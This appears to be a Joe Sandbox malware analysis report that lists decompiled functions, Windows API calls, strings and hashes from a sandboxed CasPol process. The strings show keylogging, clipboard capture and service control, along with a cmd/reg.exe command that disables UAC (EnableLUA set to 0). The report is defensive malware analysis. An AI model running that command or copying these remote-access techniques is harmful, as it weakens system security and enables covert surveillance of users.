API String ID: 3852720340-0
Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C

Function 00446ECF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
_free.LIBCMT ref: 00446F06
_free.LIBCMT ref: 00446F2E
SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
_abort.LIBCMT ref: 00446F4D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F

Function 00419C30 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5

Function 00419D32 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9

Function 00419D97 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8

Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED

Strings

DG, xrefs: 00412B2F
[regsplt], xrefs: 00412B85

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$DG
API String ID: 3554306468-1089238109
Opcode ID: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
Opcode Fuzzy Hash: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A

Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571

Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB

__Init_thread_footer.LIBCMT ref: 0040AEA7

Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C

Strings

[End of clipboard], xrefs: 0040AEE9
P]G, xrefs: 0040AE70
L]G, xrefs: 0040AE80
[Text copied to clipboard], xrefs: 0040AEF6

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
API String ID: 2974294136-4018440003
Opcode ID: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
Opcode Fuzzy Hash: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D

Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
wsprintfW.USER32 ref: 0040A905

Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84

Strings

], xrefs: 0040A892
Offline Keylogger Started, xrefs: 0040A87D
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040A88D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
Opcode Fuzzy Hash: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8

Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10

Strings

`AG, xrefs: 00409DC2

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: `AG
API String ID: 1958988193-3058481221
Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

Function 0041CA2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041CA7C
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
GetLastError.KERNEL32 ref: 0041CAA1

Strings

MsgWindowClass, xrefs: 0041CA38
0, xrefs: 0041CA3D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4

Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
CloseHandle.KERNEL32(?), ref: 00406A0F
CloseHandle.KERNEL32(?), ref: 00406A14

Strings

C:\Windows\System32\cmd.exe, xrefs: 004069FB
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8

Function 004425E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002), ref: 00442609
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000), ref: 0044263F

Strings

CorExitProcess, xrefs: 00442614
mscoree.dll, xrefs: 00442602

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C

Function 00412774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8

Strings

BG, xrefs: 00412779, 004127AA, 0041277C
pth_unenc, xrefs: 00412778

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc$BG
API String ID: 1818849710-2233081382
Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

Strings

KeepAlive | Disabled, xrefs: 00404AC6

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
Opcode Fuzzy Hash: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A

Function 0041BE7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79

Function 00401430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
GetProcAddress.KERNEL32(00000000), ref: 00401441

Strings

`#v, xrefs: 0040143A
User32.dll, xrefs: 00401435
GetCursorInfo, xrefs: 00401430

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll$`#v
API String ID: 1646373207-1032071883
Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E

Function 0044017A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9

Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF

GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
String ID:
API String ID: 3525466593-0
Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99

Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
CloseHandle.KERNEL32(00000000), ref: 0040E8AB

Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC

Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 4269425633-0
Opcode ID: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
Opcode Fuzzy Hash: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A

Function 004430A8 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044311A
_free.LIBCMT ref: 0044313A

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84

Function 0044FEE3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3FD,?,00000000,?,00000001,?,?,00000001,0043E3FD,?), ref: 0044FF30
__alloca_probe_16.LIBCMT ref: 0044FF68
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFB9
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399CF,?), ref: 0044FFCB
__freea.LIBCMT ref: 0044FFD4

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8

Function 0044E14B Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044E154
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
